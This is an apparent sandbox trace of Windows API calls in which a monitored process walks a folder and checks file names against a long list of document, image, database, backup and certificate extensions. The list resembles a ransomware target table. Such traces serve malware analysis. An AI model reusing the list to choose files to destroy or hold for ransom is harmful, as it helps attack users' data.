[0285.106] lstrcmpiW (lpString1=".avi", lpString2=".mui") returned -1 [0285.106] lstrlenW (lpString=".avs") returned 4 [0285.106] lstrcmpiW (lpString1=".avs", lpString2=".mui") returned -1 [0285.106] lstrlenW (lpString=".backup") returned 7 [0285.106] lstrcmpiW (lpString1=".backup", lpString2="exe.mui") returned -1 [0285.106] lstrlenW (lpString=".bak") returned 4 [0285.106] lstrcmpiW (lpString1=".bak", lpString2=".mui") returned -1 [0285.106] lstrlenW (lpString=".bay") returned 4 [0285.106] lstrcmpiW (lpString1=".bay", lpString2=".mui") returned -1 [0285.106] lstrlenW (lpString=".bd") returned 3 [0285.106] lstrcmpiW (lpString1=".bd", lpString2="mui") returned -1 [0285.106] lstrlenW (lpString=".bin") returned 4 [0285.107] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0285.107] lstrlenW (lpString=".bmp") returned 4 [0285.107] lstrcmpiW (lpString1=".bmp", lpString2=".mui") returned -1 [0285.107] lstrlenW (lpString=".bz2") returned 4 [0285.107] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0285.107] lstrlenW (lpString=".c") returned 2 [0285.107] lstrcmpiW (lpString1=".c", lpString2="ui") returned -1 [0285.107] lstrlenW (lpString=".cdr") returned 4 [0285.107] lstrcmpiW (lpString1=".cdr", lpString2=".mui") returned -1 [0285.107] lstrlenW (lpString=".cer") returned 4 [0285.107] lstrcmpiW (lpString1=".cer", lpString2=".mui") returned -1 [0285.107] lstrlenW (lpString=".cf") returned 3 [0285.107] lstrcmpiW (lpString1=".cf", lpString2="mui") returned -1 [0285.107] lstrlenW (lpString=".cfc") returned 4 [0285.107] lstrcmpiW (lpString1=".cfc", lpString2=".mui") returned -1 [0285.107] lstrlenW (lpString=".cfm") returned 4 [0285.107] lstrcmpiW (lpString1=".cfm", lpString2=".mui") returned -1 [0285.107] lstrlenW (lpString=".cfml") returned 5 [0285.107] lstrcmpiW (lpString1=".cfml", lpString2="e.mui") returned -1 [0285.107] lstrlenW (lpString=".cfu") returned 4 [0285.107] lstrcmpiW (lpString1=".cfu", lpString2=".mui") returned -1 [0285.107] lstrlenW (lpString=".chm") returned 4 [0285.107] lstrcmpiW (lpString1=".chm", lpString2=".mui") returned -1 [0285.107] lstrlenW (lpString=".cin") returned 4 [0285.107] lstrcmpiW (lpString1=".cin", lpString2=".mui") returned -1 [0285.107] lstrlenW (lpString=".class") returned 6 [0285.107] lstrcmpiW (lpString1=".class", lpString2="xe.mui") returned -1 [0285.107] lstrlenW (lpString=".clx") returned 4 [0285.108] lstrcmpiW (lpString1=".clx", lpString2=".mui") returned -1 [0285.108] lstrlenW (lpString=".config") returned 7 [0285.108] lstrcmpiW (lpString1=".config", lpString2="exe.mui") returned -1 [0285.108] lstrlenW (lpString=".cpp") returned 4 [0285.108] lstrcmpiW (lpString1=".cpp", lpString2=".mui") returned -1 [0285.108] lstrlenW (lpString=".cr2") returned 4 [0285.108] lstrcmpiW (lpString1=".cr2", lpString2=".mui") returned -1 [0285.108] lstrlenW (lpString=".crt") returned 4 [0285.108] lstrcmpiW (lpString1=".crt", lpString2=".mui") returned -1 [0285.108] lstrlenW (lpString=".crw") returned 4 [0285.108] lstrcmpiW (lpString1=".crw", lpString2=".mui") returned -1 [0285.108] lstrlenW (lpString=".cs") returned 3 [0285.108] lstrcmpiW (lpString1=".cs", lpString2="mui") returned -1 [0285.108] lstrlenW (lpString=".css") returned 4 [0285.108] lstrcmpiW (lpString1=".css", lpString2=".mui") returned -1 [0285.108] lstrlenW (lpString=".csv") returned 4 [0285.108] lstrcmpiW (lpString1=".csv", lpString2=".mui") returned -1 [0285.108] lstrlenW (lpString=".cub") returned 4 [0285.108] lstrcmpiW (lpString1=".cub", lpString2=".mui") returned -1 [0285.108] lstrlenW (lpString=".dae") returned 4 [0285.108] lstrcmpiW (lpString1=".dae", lpString2=".mui") returned -1 [0285.108] lstrlenW (lpString=".dat") returned 4 [0285.108] lstrcmpiW (lpString1=".dat", lpString2=".mui") returned -1 [0285.108] lstrlenW (lpString=".db") returned 3 [0285.108] lstrcmpiW (lpString1=".db", lpString2="mui") returned -1 [0285.108] lstrlenW (lpString=".dbf") returned 4 [0285.109] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0285.109] lstrlenW (lpString=".dbx") returned 4 [0285.109] lstrcmpiW (lpString1=".dbx", lpString2=".mui") returned -1 [0285.109] lstrlenW (lpString=".dc3") returned 4 [0285.109] lstrcmpiW (lpString1=".dc3", lpString2=".mui") returned -1 [0285.109] lstrlenW (lpString=".dcm") returned 4 [0285.109] lstrcmpiW (lpString1=".dcm", lpString2=".mui") returned -1 [0285.109] lstrlenW (lpString=".dcr") returned 4 [0285.109] lstrcmpiW (lpString1=".dcr", lpString2=".mui") returned -1 [0285.109] lstrlenW (lpString=".der") returned 4 [0285.109] lstrcmpiW (lpString1=".der", lpString2=".mui") returned -1 [0285.109] lstrlenW (lpString=".dib") returned 4 [0285.109] lstrcmpiW (lpString1=".dib", lpString2=".mui") returned -1 [0285.109] lstrlenW (lpString=".dic") returned 4 [0285.109] lstrcmpiW (lpString1=".dic", lpString2=".mui") returned -1 [0285.109] lstrlenW (lpString=".dif") returned 4 [0285.109] lstrcmpiW (lpString1=".dif", lpString2=".mui") returned -1 [0285.109] lstrlenW (lpString=".divx") returned 5 [0285.110] lstrcmpiW (lpString1=".divx", lpString2="e.mui") returned -1 [0285.110] lstrlenW (lpString=".djvu") returned 5 [0285.110] lstrcmpiW (lpString1=".djvu", lpString2="e.mui") returned -1 [0285.110] lstrlenW (lpString=".dng") returned 4 [0285.110] lstrcmpiW (lpString1=".dng", lpString2=".mui") returned -1 [0285.110] lstrlenW (lpString=".doc") returned 4 [0285.110] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0285.110] lstrlenW (lpString=".docm") returned 5 [0285.110] lstrcmpiW (lpString1=".docm", lpString2="e.mui") returned -1 [0285.110] lstrlenW (lpString=".docx") returned 5 [0285.110] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0285.110] lstrlenW (lpString=".dot") returned 4 [0285.110] lstrcmpiW (lpString1=".dot", lpString2=".mui") returned -1 [0285.110] lstrlenW (lpString=".dotm") returned 5 [0285.110] lstrcmpiW (lpString1=".dotm", lpString2="e.mui") returned -1 [0285.110] lstrlenW (lpString=".dotx") returned 5 [0285.110] lstrcmpiW (lpString1=".dotx", lpString2="e.mui") returned -1 [0285.110] lstrlenW (lpString=".dpx") returned 4 [0285.110] lstrcmpiW (lpString1=".dpx", lpString2=".mui") returned -1 [0285.110] lstrlenW (lpString=".dqy") returned 4 [0285.110] lstrcmpiW (lpString1=".dqy", lpString2=".mui") returned -1 [0285.110] lstrlenW (lpString=".dsn") returned 4 [0285.110] lstrcmpiW (lpString1=".dsn", lpString2=".mui") returned -1 [0285.110] lstrlenW (lpString=".dt") returned 3 [0285.110] lstrcmpiW (lpString1=".dt", lpString2="mui") returned -1 [0285.110] lstrlenW (lpString=".dtd") returned 4 [0285.110] lstrcmpiW (lpString1=".dtd", lpString2=".mui") returned -1 [0285.111] lstrlenW (lpString=".dwg") returned 4 [0285.111] lstrcmpiW (lpString1=".dwg", lpString2=".mui") returned -1 [0285.111] lstrlenW (lpString=".dwt") returned 4 [0285.111] lstrcmpiW (lpString1=".dwt", lpString2=".mui") returned -1 [0285.111] lstrlenW (lpString=".dx") returned 3 [0285.111] lstrcmpiW (lpString1=".dx", lpString2="mui") returned -1 [0285.111] lstrlenW (lpString=".dxf") returned 4 [0285.111] lstrcmpiW (lpString1=".dxf", lpString2=".mui") returned -1 [0285.111] lstrlenW (lpString=".edml") returned 5 [0285.111] lstrcmpiW (lpString1=".edml", lpString2="e.mui") returned -1 [0285.111] lstrlenW (lpString=".efd") returned 4 [0285.111] lstrcmpiW (lpString1=".efd", lpString2=".mui") returned -1 [0285.111] lstrlenW (lpString=".elf") returned 4 [0285.111] lstrcmpiW (lpString1=".elf", lpString2=".mui") returned -1 [0285.111] lstrlenW (lpString=".emf") returned 4 [0285.111] lstrcmpiW (lpString1=".emf", lpString2=".mui") returned -1 [0285.111] lstrlenW (lpString=".emz") returned 4 [0285.111] lstrcmpiW (lpString1=".emz", lpString2=".mui") returned -1 [0285.111] lstrlenW (lpString=".epf") returned 4 [0285.111] lstrcmpiW (lpString1=".epf", lpString2=".mui") returned -1 [0285.111] lstrlenW (lpString=".eps") returned 4 [0285.111] lstrcmpiW (lpString1=".eps", lpString2=".mui") returned -1 [0285.111] lstrlenW (lpString=".epsf") returned 5 [0285.111] lstrcmpiW (lpString1=".epsf", lpString2="e.mui") returned -1 [0285.111] lstrlenW (lpString=".epsp") returned 5 [0285.111] lstrcmpiW (lpString1=".epsp", lpString2="e.mui") returned -1 [0285.112] lstrlenW (lpString=".erf") returned 4 [0285.112] lstrcmpiW (lpString1=".erf", lpString2=".mui") returned -1 [0285.112] lstrlenW (lpString=".exr") returned 4 [0285.112] lstrcmpiW (lpString1=".exr", lpString2=".mui") returned -1 [0285.112] lstrlenW (lpString=".f4v") returned 4 [0285.112] lstrcmpiW (lpString1=".f4v", lpString2=".mui") returned -1 [0285.112] lstrlenW (lpString=".fido") returned 5 [0285.112] lstrcmpiW (lpString1=".fido", lpString2="e.mui") returned -1 [0285.112] lstrlenW (lpString=".flm") returned 4 [0285.112] lstrcmpiW (lpString1=".flm", lpString2=".mui") returned -1 [0285.112] lstrlenW (lpString=".flv") returned 4 [0285.112] lstrcmpiW (lpString1=".flv", lpString2=".mui") returned -1 [0285.112] lstrlenW (lpString=".frm") returned 4 [0285.112] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0285.112] lstrlenW (lpString=".fxg") returned 4 [0285.112] lstrcmpiW (lpString1=".fxg", lpString2=".mui") returned -1 [0285.112] lstrlenW (lpString=".geo") returned 4 [0285.112] lstrcmpiW (lpString1=".geo", lpString2=".mui") returned -1 [0285.112] lstrlenW (lpString=".gif") returned 4 [0285.112] lstrcmpiW (lpString1=".gif", lpString2=".mui") returned -1 [0285.112] lstrlenW (lpString=".grs") returned 4 [0285.112] lstrcmpiW (lpString1=".grs", lpString2=".mui") returned -1 [0285.112] lstrlenW (lpString=".gz") returned 3 [0285.112] lstrcmpiW (lpString1=".gz", lpString2="mui") returned -1 [0285.112] lstrlenW (lpString=".h") returned 2 [0285.112] lstrcmpiW (lpString1=".h", lpString2="ui") returned -1 [0285.112] lstrlenW (lpString=".hdr") returned 4 [0285.113] lstrcmpiW (lpString1=".hdr", lpString2=".mui") returned -1 [0285.113] lstrlenW (lpString=".hpp") returned 4 [0285.113] lstrcmpiW (lpString1=".hpp", lpString2=".mui") returned -1 [0285.113] lstrlenW (lpString=".hta") returned 4 [0285.113] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0285.113] lstrlenW (lpString=".htc") returned 4 [0285.113] lstrcmpiW (lpString1=".htc", lpString2=".mui") returned -1 [0285.113] lstrlenW (lpString=".htm") returned 4 [0285.113] lstrcmpiW (lpString1=".htm", lpString2=".mui") returned -1 [0285.113] lstrlenW (lpString=".html") returned 5 [0285.113] lstrcmpiW (lpString1=".html", lpString2="e.mui") returned -1 [0285.113] lstrlenW (lpString=".icb") returned 4 [0285.113] lstrcmpiW (lpString1=".icb", lpString2=".mui") returned -1 [0285.113] lstrlenW (lpString=".ics") returned 4 [0285.113] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0285.113] lstrlenW (lpString=".iff") returned 4 [0285.113] lstrcmpiW (lpString1=".iff", lpString2=".mui") returned -1 [0285.113] lstrlenW (lpString=".inc") returned 4 [0285.113] lstrcmpiW (lpString1=".inc", lpString2=".mui") returned -1 [0285.113] lstrlenW (lpString=".indd") returned 5 [0285.113] lstrcmpiW (lpString1=".indd", lpString2="e.mui") returned -1 [0285.113] lstrlenW (lpString=".ini") returned 4 [0285.113] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0285.113] lstrlenW (lpString=".iqy") returned 4 [0285.113] lstrcmpiW (lpString1=".iqy", lpString2=".mui") returned -1 [0285.113] lstrlenW (lpString=".j2c") returned 4 [0285.113] lstrcmpiW (lpString1=".j2c", lpString2=".mui") returned -1 [0285.113] lstrlenW (lpString=".j2k") returned 4 [0285.114] lstrcmpiW (lpString1=".j2k", lpString2=".mui") returned -1 [0285.114] lstrlenW (lpString=".java") returned 5 [0285.114] lstrcmpiW (lpString1=".java", lpString2="e.mui") returned -1 [0285.114] lstrlenW (lpString=".jp2") returned 4 [0285.114] lstrcmpiW (lpString1=".jp2", lpString2=".mui") returned -1 [0285.114] lstrlenW (lpString=".jpc") returned 4 [0285.114] lstrcmpiW (lpString1=".jpc", lpString2=".mui") returned -1 [0285.114] lstrlenW (lpString=".jpe") returned 4 [0285.114] lstrcmpiW (lpString1=".jpe", lpString2=".mui") returned -1 [0285.114] lstrlenW (lpString=".jpeg") returned 5 [0285.114] lstrcmpiW (lpString1=".jpeg", lpString2="e.mui") returned -1 [0285.114] lstrlenW (lpString=".jpf") returned 4 [0285.114] lstrcmpiW (lpString1=".jpf", lpString2=".mui") returned -1 [0285.114] lstrlenW (lpString=".jpg") returned 4 [0285.114] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0285.114] lstrlenW (lpString=".jpx") returned 4 [0285.114] lstrcmpiW (lpString1=".jpx", lpString2=".mui") returned -1 [0285.114] lstrlenW (lpString=".js") returned 3 [0285.114] lstrcmpiW (lpString1=".js", lpString2="mui") returned -1 [0285.114] lstrlenW (lpString=".jsf") returned 4 [0285.114] lstrcmpiW (lpString1=".jsf", lpString2=".mui") returned -1 [0285.114] lstrlenW (lpString=".json") returned 5 [0285.114] lstrcmpiW (lpString1=".json", lpString2="e.mui") returned -1 [0285.114] lstrlenW (lpString=".jsp") returned 4 [0285.114] lstrcmpiW (lpString1=".jsp", lpString2=".mui") returned -1 [0285.114] lstrlenW (lpString=".kdc") returned 4 [0285.114] lstrcmpiW (lpString1=".kdc", lpString2=".mui") returned -1 [0285.115] lstrlenW (lpString=".kmz") returned 4 [0285.115] lstrcmpiW (lpString1=".kmz", lpString2=".mui") returned -1 [0285.115] lstrlenW (lpString=".kwm") returned 4 [0285.115] lstrcmpiW (lpString1=".kwm", lpString2=".mui") returned -1 [0285.115] lstrlenW (lpString=".lasso") returned 6 [0285.115] lstrcmpiW (lpString1=".lasso", lpString2="xe.mui") returned -1 [0285.115] lstrlenW (lpString=".lbi") returned 4 [0285.115] lstrcmpiW (lpString1=".lbi", lpString2=".mui") returned -1 [0285.115] lstrlenW (lpString=".lgf") returned 4 [0285.115] lstrcmpiW (lpString1=".lgf", lpString2=".mui") returned -1 [0285.115] lstrlenW (lpString=".lgp") returned 4 [0285.115] lstrcmpiW (lpString1=".lgp", lpString2=".mui") returned -1 [0285.115] lstrlenW (lpString=".log") returned 4 [0285.115] lstrcmpiW (lpString1=".log", lpString2=".mui") returned -1 [0285.115] lstrlenW (lpString=".m1v") returned 4 [0285.115] lstrcmpiW (lpString1=".m1v", lpString2=".mui") returned -1 [0285.115] lstrlenW (lpString=".m4a") returned 4 [0285.115] lstrcmpiW (lpString1=".m4a", lpString2=".mui") returned -1 [0285.115] lstrlenW (lpString=".m4v") returned 4 [0285.115] lstrcmpiW (lpString1=".m4v", lpString2=".mui") returned -1 [0285.115] lstrlenW (lpString=".max") returned 4 [0285.115] lstrcmpiW (lpString1=".max", lpString2=".mui") returned -1 [0285.115] lstrlenW (lpString=".md") returned 3 [0285.115] lstrcmpiW (lpString1=".md", lpString2="mui") returned -1 [0285.115] lstrlenW (lpString=".mda") returned 4 [0285.334] lstrcmpiW (lpString1=".mda", lpString2=".mui") returned -1 [0285.334] lstrlenW (lpString=".mdb") returned 4 [0285.335] lstrcmpiW (lpString1=".mdb", lpString2=".mui") returned -1 [0285.335] lstrlenW (lpString=".mde") returned 4 [0285.335] lstrcmpiW (lpString1=".mde", lpString2=".mui") returned -1 [0285.335] lstrlenW (lpString=".mdf") returned 4 [0285.335] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0285.335] lstrlenW (lpString=".mdw") returned 4 [0285.335] lstrcmpiW (lpString1=".mdw", lpString2=".mui") returned -1 [0285.335] lstrlenW (lpString=".mef") returned 4 [0285.335] lstrcmpiW (lpString1=".mef", lpString2=".mui") returned -1 [0285.335] lstrlenW (lpString=".mft") returned 4 [0285.335] lstrcmpiW (lpString1=".mft", lpString2=".mui") returned -1 [0285.335] lstrlenW (lpString=".mfw") returned 4 [0285.335] lstrcmpiW (lpString1=".mfw", lpString2=".mui") returned -1 [0285.335] lstrlenW (lpString=".mht") returned 4 [0285.335] lstrcmpiW (lpString1=".mht", lpString2=".mui") returned -1 [0285.335] lstrlenW (lpString=".mhtml") returned 6 [0285.335] lstrcmpiW (lpString1=".mhtml", lpString2="xe.mui") returned -1 [0285.335] lstrlenW (lpString=".mka") returned 4 [0285.335] lstrcmpiW (lpString1=".mka", lpString2=".mui") returned -1 [0285.335] lstrlenW (lpString=".mkidx") returned 6 [0285.335] lstrcmpiW (lpString1=".mkidx", lpString2="xe.mui") returned -1 [0285.335] lstrlenW (lpString=".mkv") returned 4 [0285.335] lstrcmpiW (lpString1=".mkv", lpString2=".mui") returned -1 [0285.335] lstrlenW (lpString=".mos") returned 4 [0285.335] lstrcmpiW (lpString1=".mos", lpString2=".mui") returned -1 [0285.335] lstrlenW (lpString=".mov") returned 4 [0285.335] lstrcmpiW (lpString1=".mov", lpString2=".mui") returned -1 [0285.336] lstrlenW (lpString=".mp3") returned 4 [0285.336] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0285.336] lstrlenW (lpString=".mp4") returned 4 [0285.336] lstrcmpiW (lpString1=".mp4", lpString2=".mui") returned -1 [0285.336] lstrlenW (lpString=".mpeg") returned 5 [0285.336] lstrcmpiW (lpString1=".mpeg", lpString2="e.mui") returned -1 [0285.336] lstrlenW (lpString=".mpg") returned 4 [0285.336] lstrcmpiW (lpString1=".mpg", lpString2=".mui") returned -1 [0285.336] lstrlenW (lpString=".mpv") returned 4 [0285.336] lstrcmpiW (lpString1=".mpv", lpString2=".mui") returned -1 [0285.336] lstrlenW (lpString=".mrw") returned 4 [0285.336] lstrcmpiW (lpString1=".mrw", lpString2=".mui") returned -1 [0285.336] lstrlenW (lpString=".msg") returned 4 [0285.336] lstrcmpiW (lpString1=".msg", lpString2=".mui") returned -1 [0285.336] lstrlenW (lpString=".mxl") returned 4 [0285.336] lstrcmpiW (lpString1=".mxl", lpString2=".mui") returned 1 [0285.336] lstrlenW (lpString=".myd") returned 4 [0285.336] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0285.336] lstrlenW (lpString=".myi") returned 4 [0285.336] lstrcmpiW (lpString1=".myi", lpString2=".mui") returned 1 [0285.336] lstrlenW (lpString=".nef") returned 4 [0285.336] lstrcmpiW (lpString1=".nef", lpString2=".mui") returned 1 [0285.336] lstrlenW (lpString=".nrw") returned 4 [0285.336] lstrcmpiW (lpString1=".nrw", lpString2=".mui") returned 1 [0285.336] lstrlenW (lpString=".obj") returned 4 [0285.336] lstrcmpiW (lpString1=".obj", lpString2=".mui") returned 1 [0285.336] lstrlenW (lpString=".odb") returned 4 [0285.336] lstrcmpiW (lpString1=".odb", lpString2=".mui") returned 1 [0285.337] lstrlenW (lpString=".odc") returned 4 [0285.337] lstrcmpiW (lpString1=".odc", lpString2=".mui") returned 1 [0285.337] lstrlenW (lpString=".odm") returned 4 [0285.337] lstrcmpiW (lpString1=".odm", lpString2=".mui") returned 1 [0285.337] lstrlenW (lpString=".odp") returned 4 [0285.337] lstrcmpiW (lpString1=".odp", lpString2=".mui") returned 1 [0285.337] lstrlenW (lpString=".ods") returned 4 [0285.337] lstrcmpiW (lpString1=".ods", lpString2=".mui") returned 1 [0285.337] lstrlenW (lpString=".oft") returned 4 [0285.337] lstrcmpiW (lpString1=".oft", lpString2=".mui") returned 1 [0285.337] lstrlenW (lpString=".one") returned 4 [0285.337] lstrcmpiW (lpString1=".one", lpString2=".mui") returned 1 [0285.337] lstrlenW (lpString=".onepkg") returned 7 [0285.337] lstrcmpiW (lpString1=".onepkg", lpString2="exe.mui") returned -1 [0285.337] lstrlenW (lpString=".onetoc2") returned 8 [0285.337] lstrcmpiW (lpString1=".onetoc2", lpString2=".exe.mui") returned 1 [0285.337] lstrlenW (lpString=".opt") returned 4 [0285.337] lstrcmpiW (lpString1=".opt", lpString2=".mui") returned 1 [0285.337] lstrlenW (lpString=".oqy") returned 4 [0285.337] lstrcmpiW (lpString1=".oqy", lpString2=".mui") returned 1 [0285.338] lstrlenW (lpString=".orf") returned 4 [0285.338] lstrcmpiW (lpString1=".orf", lpString2=".mui") returned 1 [0285.338] lstrlenW (lpString=".p12") returned 4 [0285.338] lstrcmpiW (lpString1=".p12", lpString2=".mui") returned 1 [0285.338] lstrlenW (lpString=".p7b") returned 4 [0285.338] lstrcmpiW (lpString1=".p7b", lpString2=".mui") returned 1 [0285.338] lstrlenW (lpString=".p7c") returned 4 [0285.338] lstrcmpiW (lpString1=".p7c", lpString2=".mui") returned 1 [0285.338] lstrlenW (lpString=".pam") returned 4 [0285.338] lstrcmpiW (lpString1=".pam", lpString2=".mui") returned 1 [0285.338] lstrlenW (lpString=".pbm") returned 4 [0285.338] lstrcmpiW (lpString1=".pbm", lpString2=".mui") returned 1 [0285.338] lstrlenW (lpString=".pct") returned 4 [0285.338] lstrcmpiW (lpString1=".pct", lpString2=".mui") returned 1 [0285.338] lstrlenW (lpString=".pcx") returned 4 [0285.338] lstrcmpiW (lpString1=".pcx", lpString2=".mui") returned 1 [0285.338] lstrlenW (lpString=".pdd") returned 4 [0285.338] lstrcmpiW (lpString1=".pdd", lpString2=".mui") returned 1 [0285.338] lstrlenW (lpString=".pdf") returned 4 [0285.338] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0285.338] lstrlenW (lpString=".pdp") returned 4 [0285.338] lstrcmpiW (lpString1=".pdp", lpString2=".mui") returned 1 [0285.338] lstrlenW (lpString=".pef") returned 4 [0285.338] lstrcmpiW (lpString1=".pef", lpString2=".mui") returned 1 [0285.338] lstrlenW (lpString=".pem") returned 4 [0285.338] lstrcmpiW (lpString1=".pem", lpString2=".mui") returned 1 [0285.338] lstrlenW (lpString=".pff") returned 4 [0285.339] lstrcmpiW (lpString1=".pff", lpString2=".mui") returned 1 [0285.339] lstrlenW (lpString=".pfm") returned 4 [0285.339] lstrcmpiW (lpString1=".pfm", lpString2=".mui") returned 1 [0285.339] lstrlenW (lpString=".pfx") returned 4 [0285.339] lstrcmpiW (lpString1=".pfx", lpString2=".mui") returned 1 [0285.339] lstrlenW (lpString=".pgm") returned 4 [0285.339] lstrcmpiW (lpString1=".pgm", lpString2=".mui") returned 1 [0285.339] lstrlenW (lpString=".php") returned 4 [0285.339] lstrcmpiW (lpString1=".php", lpString2=".mui") returned 1 [0285.339] lstrlenW (lpString=".php3") returned 5 [0285.339] lstrcmpiW (lpString1=".php3", lpString2="e.mui") returned -1 [0285.339] lstrlenW (lpString=".php4") returned 5 [0285.339] lstrcmpiW (lpString1=".php4", lpString2="e.mui") returned -1 [0285.339] lstrlenW (lpString=".php5") returned 5 [0285.339] lstrcmpiW (lpString1=".php5", lpString2="e.mui") returned -1 [0285.339] lstrlenW (lpString=".phtml") returned 6 [0285.339] lstrcmpiW (lpString1=".phtml", lpString2="xe.mui") returned -1 [0285.339] lstrlenW (lpString=".pict") returned 5 [0285.339] lstrcmpiW (lpString1=".pict", lpString2="e.mui") returned -1 [0285.339] lstrlenW (lpString=".pl") returned 3 [0285.339] lstrcmpiW (lpString1=".pl", lpString2="mui") returned -1 [0285.339] lstrlenW (lpString=".pls") returned 4 [0285.339] lstrcmpiW (lpString1=".pls", lpString2=".mui") returned 1 [0285.339] lstrlenW (lpString=".pm") returned 3 [0285.339] lstrcmpiW (lpString1=".pm", lpString2="mui") returned -1 [0285.339] lstrlenW (lpString=".png") returned 4 [0285.339] lstrcmpiW (lpString1=".png", lpString2=".mui") returned 1 [0285.340] lstrlenW (lpString=".pnm") returned 4 [0285.340] lstrcmpiW (lpString1=".pnm", lpString2=".mui") returned 1 [0285.340] lstrlenW (lpString=".pot") returned 4 [0285.340] lstrcmpiW (lpString1=".pot", lpString2=".mui") returned 1 [0285.340] lstrlenW (lpString=".potm") returned 5 [0285.340] lstrcmpiW (lpString1=".potm", lpString2="e.mui") returned -1 [0285.340] lstrlenW (lpString=".potx") returned 5 [0285.340] lstrcmpiW (lpString1=".potx", lpString2="e.mui") returned -1 [0285.340] lstrlenW (lpString=".ppa") returned 4 [0285.340] lstrcmpiW (lpString1=".ppa", lpString2=".mui") returned 1 [0285.340] lstrlenW (lpString=".ppam") returned 5 [0285.340] lstrcmpiW (lpString1=".ppam", lpString2="e.mui") returned -1 [0285.340] lstrlenW (lpString=".ppm") returned 4 [0285.340] lstrcmpiW (lpString1=".ppm", lpString2=".mui") returned 1 [0285.340] lstrlenW (lpString=".pps") returned 4 [0285.340] lstrcmpiW (lpString1=".pps", lpString2=".mui") returned 1 [0285.340] lstrlenW (lpString=".ppsm") returned 5 [0285.340] lstrcmpiW (lpString1=".ppsm", lpString2="e.mui") returned -1 [0285.340] lstrlenW (lpString=".ppt") returned 4 [0285.340] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0285.340] lstrlenW (lpString=".pptm") returned 5 [0285.340] lstrcmpiW (lpString1=".pptm", lpString2="e.mui") returned -1 [0285.340] lstrlenW (lpString=".pptx") returned 5 [0285.340] lstrcmpiW (lpString1=".pptx", lpString2="e.mui") returned -1 [0285.340] lstrlenW (lpString=".prn") returned 4 [0285.340] lstrcmpiW (lpString1=".prn", lpString2=".mui") returned 1 [0285.340] lstrlenW (lpString=".ps") returned 3 [0285.340] lstrcmpiW (lpString1=".ps", lpString2="mui") returned -1 [0285.341] lstrlenW (lpString=".psb") returned 4 [0285.341] lstrcmpiW (lpString1=".psb", lpString2=".mui") returned 1 [0285.341] lstrlenW (lpString=".psd") returned 4 [0285.341] lstrcmpiW (lpString1=".psd", lpString2=".mui") returned 1 [0285.341] lstrlenW (lpString=".pst") returned 4 [0285.341] lstrcmpiW (lpString1=".pst", lpString2=".mui") returned 1 [0285.341] lstrlenW (lpString=".ptx") returned 4 [0285.341] lstrcmpiW (lpString1=".ptx", lpString2=".mui") returned 1 [0285.341] lstrlenW (lpString=".pub") returned 4 [0285.341] lstrcmpiW (lpString1=".pub", lpString2=".mui") returned 1 [0285.341] lstrlenW (lpString=".pwm") returned 4 [0285.341] lstrcmpiW (lpString1=".pwm", lpString2=".mui") returned 1 [0285.341] lstrlenW (lpString=".pxr") returned 4 [0285.341] lstrcmpiW (lpString1=".pxr", lpString2=".mui") returned 1 [0285.341] lstrlenW (lpString=".py") returned 3 [0285.341] lstrcmpiW (lpString1=".py", lpString2="mui") returned -1 [0285.341] lstrlenW (lpString=".qt") returned 3 [0285.341] lstrcmpiW (lpString1=".qt", lpString2="mui") returned -1 [0285.341] lstrlenW (lpString=".r3d") returned 4 [0285.341] lstrcmpiW (lpString1=".r3d", lpString2=".mui") returned 1 [0285.341] lstrlenW (lpString=".raf") returned 4 [0285.341] lstrcmpiW (lpString1=".raf", lpString2=".mui") returned 1 [0285.341] lstrlenW (lpString=".rar") returned 4 [0285.341] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0285.342] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef586d37, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0285.342] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef586d37, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0285.342] FindClose (in: hFindFile=0x3947d68 | out: hFindFile=0x3947d68) returned 1 [0285.342] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4014d58 | out: hHeap=0x470000) returned 1 [0285.342] FindNextFileW (in: hFindFile=0x3947e28, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000c12e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xc4853f40, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="es-MX", cAlternateFileName="")) returned 1 [0285.342] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4014d58 